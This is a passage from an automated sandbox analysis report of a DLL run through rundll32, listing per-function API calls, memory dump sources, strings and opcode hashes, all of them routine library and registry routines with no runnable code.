                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040569
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800405A1
                                                                  • Sleep.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004061C
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$Enter$Sleep
                                                                  • String ID:
                                                                  • API String ID: 950586405-0
                                                                  • Opcode ID: 5fd251fa728f84f380744b40e651b61ba74c7f1c4af02f91f8a7010bdfac5f08
                                                                  • Instruction ID: e5e3152c6d786b815c8bb063f8079f541e8d353448f2aaa10215c0b82b1e43f2
                                                                  • Opcode Fuzzy Hash: 5fd251fa728f84f380744b40e651b61ba74c7f1c4af02f91f8a7010bdfac5f08
                                                                  • Instruction Fuzzy Hash: E8618C31301A4892FAD69B21EC943DA23A4F78DBE9F66C515ED6A572A1CF38C74DC700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180010990 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateValue
                                                                  • String ID: 360scan
                                                                  • API String ID: 1818849710-2450673717
                                                                  • Opcode ID: 5bf155bf79df099cab00ad323e7c5f0b1ac545c6889d31c6f531c87adec6c7e2
                                                                  • Instruction ID: 36ede12e68d324247f48980037de7b94a87db2de9e86c0014956a12bc0703eb2
                                                                  • Opcode Fuzzy Hash: 5bf155bf79df099cab00ad323e7c5f0b1ac545c6889d31c6f531c87adec6c7e2
                                                                  • Instruction Fuzzy Hash: 4341B132714B9885F7928B75D8503DC2B70BB8CBE8F549215EEA953BA5DF78C24AC300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800671A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ?terminate@@ExceptionThrow__crt_fast_encode_pointermalloc
                                                                  • String ID: csm
                                                                  • API String ID: 760693298-1018135373
                                                                  • Opcode ID: 39eb716e9be1fb63b9110d3c5425ec3b5de1197dc277d27b79cf19f29df3a86f
                                                                  • Instruction ID: 259617d04e03f410bbb53384dcf33072f4c9910d22c17cce453464633d750d07
                                                                  • Opcode Fuzzy Hash: 39eb716e9be1fb63b9110d3c5425ec3b5de1197dc277d27b79cf19f29df3a86f
                                                                  • Instruction Fuzzy Hash: CB41DD72310B4886DBA29F25E8807ADB3A2F748BC8F208016FB5D43B56CF38DA55C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180008224 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55registrylibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCreateHandleModuleProc
                                                                  • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                  • API String ID: 1964897782-2994018265
                                                                  • Opcode ID: ad3fb016844a3b870c46d04542df6f296797cd153b096fbf22ac7f30fc2e7ae0
                                                                  • Instruction ID: ad22b3d90bad73cc844585d5212e8c39d9a41fcfaef769d6902fd1eabb8e997b
                                                                  • Opcode Fuzzy Hash: ad3fb016844a3b870c46d04542df6f296797cd153b096fbf22ac7f30fc2e7ae0
                                                                  • Instruction Fuzzy Hash: 77210C32619B8482EBA1CB55F8547AAB7A0F7C8BD4F149115EACD07B68CF7CC248CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018000E2D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AppendFileModuleNamePathmemset
                                                                  • String ID: ..\Config\cloudcfg.dat$cloudcfg.dat
                                                                  • API String ID: 1620117007-2349577946
                                                                  • Opcode ID: 1df7031f83b1f1459874d000a77c3faa375f56ebc32878d2fd44ce6dffecdc51
                                                                  • Instruction ID: ddd92409ecb0ccec80f2ab3f904b9d803dc2e3fbc70a3a57e8900bd834cf0119
                                                                  • Opcode Fuzzy Hash: 1df7031f83b1f1459874d000a77c3faa375f56ebc32878d2fd44ce6dffecdc51
                                                                  • Instruction Fuzzy Hash: DD216F71204A8881EA91DB11E8443DE7360F78ABD9F90C211FA9947AE9DF7DC74DCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180074A30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: c2f829957779a5f3283623a795060286876ebd1f64ff5d399dec1781f672f9f2
                                                                  • Instruction ID: e395451e8db6c2212d1c7d058d3e5d590d561a96988dee0adbc21a3ed47a46ec
                                                                  • Opcode Fuzzy Hash: c2f829957779a5f3283623a795060286876ebd1f64ff5d399dec1781f672f9f2
                                                                  • Instruction Fuzzy Hash: 3CF0903120070491EEA28B64A84439A2360FB8C7E1F548619E67A4A2F4CF3DC34DC300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180018AE8 Relevance: 7.7, APIs: 5, Instructions: 244COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$??3@EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 3906572401-0
                                                                  • Opcode ID: 8704770b73637da07f2765808fbc5d80e4dde8a3e535cddf5f679fa9373d9d11
                                                                  • Instruction ID: 485792f3aa206c277c5c0904b00aba5ea33dd2ed139350c249341fca4c3fabed
                                                                  • Opcode Fuzzy Hash: 8704770b73637da07f2765808fbc5d80e4dde8a3e535cddf5f679fa9373d9d11
                                                                  • Instruction Fuzzy Hash: 5CB15732B05B448AEB51CFA0A8407DD33F5F748798F144526EE9867B88DF34C65AD354
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180070F00 Relevance: 7.7, APIs: 5, Instructions: 174COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errno
                                                                  • String ID:
                                                                  • API String ID: 2918714741-0
                                                                  • Opcode ID: 8b2e5358ef7994b7672dda4e212676a9332a6cdbfea30cd8ee4f2d86f2200a94
                                                                  • Instruction ID: 273587a47ae5326c80e6ba55da8392b357747b6508265d18e5e13f97f53468fd
                                                                  • Opcode Fuzzy Hash: 8b2e5358ef7994b7672dda4e212676a9332a6cdbfea30cd8ee4f2d86f2200a94
                                                                  • Instruction Fuzzy Hash: 7471A572204B88CAE7AA8F19A4403EE77A4FB887D4F148115FE9947BD4DF3AC604C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180016CA8 Relevance: 7.6, APIs: 5, Instructions: 114COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@memmove$??3@
                                                                  • String ID:
                                                                  • API String ID: 232491532-0
                                                                  • Opcode ID: 36aecff153c17e78cc281762afab7df910fd19be64e25fb5c31b0b5d4ec441f6
                                                                  • Instruction ID: 28467c757ab6f7ef32b6ddf95ff48fc265dfbbceda238bfa6dff49904db51385
                                                                  • Opcode Fuzzy Hash: 36aecff153c17e78cc281762afab7df910fd19be64e25fb5c31b0b5d4ec441f6
                                                                  • Instruction Fuzzy Hash: 0C41C432B05B8881EF568B16F9403996361E748BE0F548725AB7A07BE9DF78C6958340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018006A658 Relevance: 7.6, APIs: 5, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _swprintf_c_l.LIBCMT ref: 000000018006A6B0
                                                                  • memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A6DB
                                                                  • memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A755
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memmove$_swprintf_c_l
                                                                  • String ID:
                                                                  • API String ID: 3930809162-0
                                                                  • Opcode ID: 4d957fd311e85dbc9e9e1d2fcdfd49009c8516e907acacc0d6bfdbff04455b87
                                                                  • Instruction ID: 2e3324a3b5d682f35c297bfefc02d538748b26edc97be9d81ac6111acbd6bae8
                                                                  • Opcode Fuzzy Hash: 4d957fd311e85dbc9e9e1d2fcdfd49009c8516e907acacc0d6bfdbff04455b87
                                                                  • Instruction Fuzzy Hash: 0A41E33231875496EBA5DA26D90079A67A2BB4DBC0F248015AF1A43F41DE35D6688B40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180044CE4 Relevance: 7.6, APIs: 6, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$Enter
                                                                  • String ID:
                                                                  • API String ID: 2978645861-0
                                                                  • Opcode ID: 84f7991fb58de1b865a10277cce647e74e53e0d7bb9d3c9fb8eb0733b83dca90
                                                                  • Instruction ID: 73bd4c9cd9396375e0c1b942217bf14bfc10cb3082dae23d56ea31479293823c
                                                                  • Opcode Fuzzy Hash: 84f7991fb58de1b865a10277cce647e74e53e0d7bb9d3c9fb8eb0733b83dca90
                                                                  • Instruction Fuzzy Hash: 19413932641B0896FA869F21EC943E83764F749FD9F598115EAA50B3A5CF28C74EC304
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180016090 Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@memmove$??3@
                                                                  • String ID:
                                                                  • API String ID: 232491532-0
                                                                  • Opcode ID: 4c8a09d1fefffe74558815fc45e4f8bd62bc61723e2fbaaf498aee53098e704a
                                                                  • Instruction ID: 3308181ea52ff5a0dd97f5d36b69886329373971ad435e2f25c4df82c4de258d
                                                                  • Opcode Fuzzy Hash: 4c8a09d1fefffe74558815fc45e4f8bd62bc61723e2fbaaf498aee53098e704a
                                                                  • Instruction Fuzzy Hash: 8231D332705B8894EF5ACF16D9443986362F709FE0F588615EE6E07BE6DE78D299C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800161EC Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 0000000180016298
                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162A6
                                                                  • ??3@YAXPEAX@Z.MSVCRT ref: 00000001800162DE
                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162E8
                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memmove$??3@
                                                                  • String ID:
                                                                  • API String ID: 2321372689-0
                                                                  • Opcode ID: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
                                                                  • Instruction ID: b2b38ff55e60cbfe57fc328909b4bad170525be2db7207aa5bf6da73de3f6202
                                                                  • Opcode Fuzzy Hash: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
                                                                  • Instruction Fuzzy Hash: 7831D272700A8891DB569F12E9043DE6351F748FD0F948522EF5E4BBA6DE3CC259C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800442DC Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memmove$??3@
                                                                  • String ID:
                                                                  • API String ID: 2321372689-0
                                                                  • Opcode ID: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
                                                                  • Instruction ID: 762f5997fa826d969e67cf094c143b4ceaf1448be14793aa958531d929a095e6
                                                                  • Opcode Fuzzy Hash: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
                                                                  • Instruction Fuzzy Hash: 8231A172300E9885D94AEE5286843DCA765F74DFD4F66C521BF680BB96CE38D24AC304
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180057FF0 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AncestorFromPointRectmemset
                                                                  • String ID:
                                                                  • API String ID: 3039914759-0
                                                                  • Opcode ID: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
                                                                  • Instruction ID: 06be680ac09e87041cb82e4d3d0d5ca659cc845397dc933fd24aa54eca265516
                                                                  • Opcode Fuzzy Hash: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
                                                                  • Instruction Fuzzy Hash: 1931CD32615A4486F7E28F25DC487DA63A4FB8C7C4F449020FE5977694EF39CA99D700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180004B34 Relevance: 7.6, APIs: 5, Instructions: 82COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errnoiswspace$memmove
                                                                  • String ID:
                                                                  • API String ID: 972559988-0
                                                                  • Opcode ID: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
                                                                  • Instruction ID: aea15859d9ef88290176a7c9cabebc096ef147a52e12ca1286494642d1a9418c
                                                                  • Opcode Fuzzy Hash: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
                                                                  • Instruction Fuzzy Hash: 3531CBB3601A4886EB99DF54D9847ED33A0F788BC0F18C019EB4A0B792DF3DDA588744
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180010EFC Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$CriticalSection$Delete$EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 274858031-0
                                                                  • Opcode ID: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
                                                                  • Instruction ID: d11087617417198f0cbd7eb66d5c9be171642f9dfb033e604718f16c8d919299
                                                                  • Opcode Fuzzy Hash: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
                                                                  • Instruction Fuzzy Hash: 49312A36201E88A2EB569F64E4913DDA360F7897D0F54C522EB9D437A1DF78DAA9C300
                                                                  Uniqueness

